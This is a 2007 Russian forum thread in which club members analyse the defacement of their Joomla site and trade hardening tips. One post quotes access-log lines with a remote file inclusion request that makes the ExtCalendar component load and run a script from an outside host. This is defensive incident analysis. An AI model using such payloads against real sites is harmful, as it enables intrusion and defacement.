Наш сайт хакнули. :(

Описание: Форум для всего что не попадает в другие разделы
Модератор: 135

БАRМАLЕЙ M
Автор темы
Аватара
БАRМАLЕЙ M
Автор темы
Сайт

#1 БАRМАLЕЙ » 21.03.2007, 10:39

Главной страницы больше нет. :(
http://www.4x4krasnodar.ru/
Турки проклятые.

135 M
Аватара
135 M

#2 135 » 21.03.2007, 10:44

Турки, сука, молодцы :-)) растут в проф плане. Совсем недавно вообще лохи были, а теперь вишь, уже хакают помалу %-)))))
Кстати они не должны были мочкануть главную страницу, скорее всего просто повесили свой индекс.

igor4737 M
Аватара
igor4737 M
Откуда: Россия, Красноярский край
ICQ Сайт

#3 igor4737 » 21.03.2007, 10:53

Ну да, точгно индекс, админ ау! Верни как надо!

Kosh
Kosh
Сайт

#4 Kosh » 21.03.2007, 10:54

igor4737 писал(а):Ну да, точгно индекс, админ ау! Верни как надо!
Не волнуйтесь. Вернёт как сможет.

BELL
BELL
ICQ Сайт

#5 BELL » 21.03.2007, 10:55

KEE, первым делом поищи .htaccess в корне с редиректом
если нет - разбирайся :)
а я тебя на днях предупреждал. Мне повезло - мой сайт использовали как хостинг для скриптов для кражи кредитных карт американцы - вовремя просек и прикрыл.

Никак жумлу включили в популярный сканер? :)

BELL
BELL
ICQ Сайт

#6 BELL » 21.03.2007, 10:58

А дизайнеры из турков низачОтные нифига :D

tolik777
tolik777

#7 tolik777 » 21.03.2007, 11:25

А причину нашли каким образом взломали? Где-то же находиться дырявый скрипт и надо дыру эту прикрыть.
И главное проверить все директории сайта - не оставили шелл какой-ниубдь. Т.к. обычно оставляют.

Токайдзин
Аватара
Токайдзин
ICQ Сайт

#8 Токайдзин » 21.03.2007, 11:30

Пардон, чем это грозит? Инфа потеряна? Хозяин хостинга несет ответственность?

Oktan
Аватара
Oktan
ICQ Сайт

#9 Oktan » 21.03.2007, 11:31

Я уверен, основная причина - свежая дырка в Джумле.
Есть несколько вариантов:
1. турки - порядочные хакеры, забэкапили сайт, подменили только индексовую страницу.
2. турки - немного скоты, снесли все файлы на винте сервера, базу не тронули.
3. турки - полные уроды, снесли все, что относится к движку САЙТА.
Я больше склоняюсь ко второму варианту, раз форум жив, значит базу не трогали.

135 M
Аватара
135 M

#10 135 » 21.03.2007, 11:32

Да никто ничего не бакапил, просто индексную страницу переписали.
Стопудово даже в .htaccess никто не лазил - оно им надо? Доступ получили, страничку повесили и бегом радоваться.
Ничем не грозит. Ничего же ценного не лежит там?

Гендель
Гендель
ICQ

#11 Гендель » 21.03.2007, 11:52

не ну не уроды а?? лучше бы какойнить другой посерьезней зашишенный сайт грохнули хоть пацпнами-бы нормальными выглядели ну Краевой адменистации или МВД ну вообшем сурьезней. а так хулиганы пакостники непойми чего добились.

BELL
BELL
ICQ Сайт

#12 BELL » 21.03.2007, 11:57

135 писал(а):даже в .htaccess никто не лазил
я не смог достучаться до некоторых основных скриптов сайта. Нет, это хтаццесс, стопудов.

стопудово com_joomlaexplorer ломали - в нем есть дырки. Я его просто убил у себя - я им не пользуюсь.[/list]

BELL
BELL
ICQ Сайт

#13 BELL » 21.03.2007, 11:58

Гендель писал(а):Краевой адменистации или МВД
Не смеши :)

их неломают потому что хтмл, набросанный в ворде - там скриптов то нет :D :D :lol:

максимум - для сборки хтмл модулей воедино - тож неломаеццо :)

кстати турки тож дреамвьювером пользуются :)

135 M
Аватара
135 M

#14 135 » 21.03.2007, 12:01

BELL, не свети прошлое ;-)
Может и акцесс -))), вскрытие покажет ;-)
имхо жмуля не единственный возможный вариант. Не про конкретно сейчас а вообще.

BELL
BELL
ICQ Сайт

#15 BELL » 21.03.2007, 12:06

да эт понятно
учитывая что компонентов немеряно левых, которые непонятно кто разрабатывал. Сам боюсь :)

но хостера врядли. Мастерхост же!! :)

Гендель
Гендель
ICQ

#16 Гендель » 21.03.2007, 12:09

BELL писал(а):
Гендель писал(а):Краевой адменистации или МВД
Не смеши :)

их неломают потому что хтмл, набросанный в ворде - там скриптов то нет :D :D :lol:

максимум - для сборки хтмл модулей воедино - тож неломаеццо :)

кстати турки тож дреамвьювером пользуются :)

не ну ладно я не так уж хорошо разбираюсь во всем этом. просто высказал свои имоции.. Считай что пристыдил, буду на досуге пичитавать самоучитель какойнибудь по хтмл :read

БАRМАLЕЙ M
Автор темы
Аватара
БАRМАLЕЙ M
Автор темы
Сайт

#17 БАRМАLЕЙ » 21.03.2007, 12:10

Обидно на!
Почему бы Евгению не дать порядочным людям возможность оперативно реагировать на такие вещи (Беллу или Костегу например) ??????

135 M
Аватара
135 M

#18 135 » 21.03.2007, 12:13

колхоз - зло.

БАRМАLЕЙ M
Автор темы
Аватара
БАRМАLЕЙ M
Автор темы
Сайт

#19 БАRМАLЕЙ » 21.03.2007, 12:13

135 писал(а):колхоз - зло.

злость - зло.

135 M
Аватара
135 M

#20 135 » 21.03.2007, 12:14

не понял к чему злость? Я просто высказал своё мнение что колхоз ни к чему хорошему не приведёт.

BELL
BELL
ICQ Сайт

#21 BELL » 21.03.2007, 12:16

БARMALEЙ
админ должен быть один
это - ЗАКОН

BELL
BELL
ICQ Сайт

#22 BELL » 21.03.2007, 12:34

в тему:
http://ru-mambo.ru/smf/index.php?action=printpage;topic=17157.0

КЕЕ, скорее всего я ошибался
вот она дырка, в календаре
щас буду разбираться (

BELL
BELL
ICQ Сайт

#23 BELL » 21.03.2007, 12:47

Так, КЕЕ
ставь в .htaccess строчки

Код: Выделить всё

php_flag   register_globals off
php_flag   magic_quotes_gpc on

в globals.php ставь 0
все работает вроде
и по мелочам тут
http://joomlaportal.ru/content/view/952/70/

BELL
BELL
ICQ Сайт

#24 BELL » 21.03.2007, 13:15

да, и естественно смена всех паролей, включая бд.
Щас нашел файл на своем хостинге - ломали тож через дыру в календаре, так он перебирает всех клиентов и брутфорсит пароли, причом исполняется на хостера же серваке. Большой плюс - ограничение времени работы всех скриптов 30 сек. Надеюсь, много подобрать он не успел :)

Токайдзин
Аватара
Токайдзин
ICQ Сайт

#25 Токайдзин » 21.03.2007, 13:30

Эй, хирурги!!?
Больной ходить будет?
Ps: Турок, - он, сцуко, подлый... Мочи козлов!

135 M
Аватара
135 M

#26 135 » 21.03.2007, 13:43

При чём тут турок?

BELL
BELL
ICQ Сайт

#27 BELL » 21.03.2007, 14:33

Мля, класика, как в книгах :lol:
исполнили скрипт

Код: Выделить всё

172.180.205.160 kuban4x4.ru - - [19/Mar/2007:18:47:27 +0300] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.grodmansskolan.se/cmd.txt? HTTP/1.1" 200 1409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

смотрели результат своих действий (скрипта ихнего)

Код: Выделить всё

172.180.205.160 kuban4x4.ru - - [19/Mar/2007:18:48:28 +0300] "GET /components/com_extcalendar/scan/index.html HTTP/1.1" 200 2267 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

ниасилил

Код: Выделить всё

172.180.205.160 kuban4x4.ru - - [19/Mar/2007:18:49:30 +0300] "GET /components/com_extcalendar/scan/google.php?q=Busca:%20inurl:agendax= HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Судя по всему, нихто не попался на удочку (кроме меня, я проверял что будет)

Код: Выделить всё

62.183.13.169 kuban4x4.ru - - [19/Mar/2007:18:54:36 +0300] "GET /components/com_extcalendar/militarybankonline.bankofamerica.com HTTP/1.1" 404 269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2; MRA 4.6 (build 01425); .NET CLR 1.1.4322)"


вот так оно, товарищи!

135 M
Аватара
135 M

#28 135 » 21.03.2007, 14:43

Офигеть, школьники из швеции -))))
° Ср 21-Мар-2007 14:43:40, Наш сайт хакнули. :( - 135
° Ср 21-Мар-2007 12:04:21, СТЫД И СРАМ! (и низачот) - Гендель
° Ср 21-Мар-2007 11:32:17, Заберите этот хлам! Даже в Краснодар привезу! - Alex A. Bel.

не подумайте плохо ;-)

БАRМАLЕЙ M
Автор темы
Аватара
БАRМАLЕЙ M
Автор темы
Сайт

#29 БАRМАLЕЙ » 21.03.2007, 15:35

135 писал(а):Офигеть, школьники из швеции -))))
° Ср 21-Мар-2007 14:43:40, Наш сайт хакнули. - 135
° Ср 21-Мар-2007 12:04:21, СТЫД И СРАМ! (и низачот) - Гендель
° Ср 21-Мар-2007 11:32:17, Заберите этот хлам! Даже в Краснодар привезу! - Alex A. Bel.

не подумайте плохо

никак не пойму, что ты этим хотел сказать? Расшифруй.

135 M
Аватара
135 M

#30 135 » 21.03.2007, 15:42

просто игра слов...

Alex A. Bel.
Alex A. Bel.
ICQ Сайт

#31 Alex A. Bel. » 21.03.2007, 16:54

АфффигетЬ! вот теперь я ещё и шведский школьник :)

БАRМАLЕЙ M
Автор темы
Аватара
БАRМАLЕЙ M
Автор темы
Сайт

#32 БАRМАLЕЙ » 21.03.2007, 16:55

Alex A. Bel. привыкай...

135 M
Аватара
135 M

#33 135 » 21.03.2007, 17:04

Да ладно тупого включать %-)
шведские школьники это - www.grodmansskolan.se

Гендель
Гендель
ICQ

#34 Гендель » 21.03.2007, 18:34

и что?? я наверное действитель шведский школьник потому что ваашене понял..

nejimaki-dori
nejimaki-dori
ICQ Сайт

#35 nejimaki-dori » 21.03.2007, 19:09

Гы! :ROFL: тады не шведские,а эстонские! :lol: Гендель,не в обиду :wink: (против эстонцев тож ничего не имею!)

BELL
BELL
ICQ Сайт

#36 BELL » 21.03.2007, 20:31

Долго они добирались до сайта ))

733 M
Аватара
733 M
Сайт

#37 733 » 21.03.2007, 22:06

Ура-а-а-а-а-а-а!!!!!. Женя всё востановил. Наверно хакнули по первому варианту. :)

doctor
doctor

#38 doctor » 21.03.2007, 22:38

733 писал(а):Ура-а-а-а-а-а-а!!!!!. Женя всё востановил. Наверно хакнули по первому варианту. :)
Тогда пусть сразу ставит защиту от прочих вариантов! :) :ROFL:

БАRМАLЕЙ M
Автор темы
Аватара
БАRМАLЕЙ M
Автор темы
Сайт

#39 БАRМАLЕЙ » 22.03.2007, 09:29

Жека маладэтс!!! :D :lol: :ROFL: [/b]

BELL
BELL
ICQ Сайт

#40 BELL » 22.03.2007, 14:50

я был неправ - переписали конфиг :)
эффект тот же самый как и при редиректе - конфиг инкляйдится во все скрипты без исключения. Вотт такк, однако :)

Жень, все таки постарайся глобалс выключить. Надо.


Название раздела: Общие вопросы
Описание: Форум для всего что не попадает в другие разделы

Быстрый ответ


Введите код в точности так, как вы его видите. Регистр символов не имеет значения.
Код подтверждения
:) :( :D :lol: :ROFL: 8) :Yahoo!: :x :oops: :cry: :evil: :twisted: :roll: :wink: :o :shock: :crazy: %) :P :Rose: :Search: =@ :Bravo: :good: :bad: :sorry: :pardon: :beer: :no: :friends: O:-) Ещё смайлики…
   

Список разделов Общие вопросы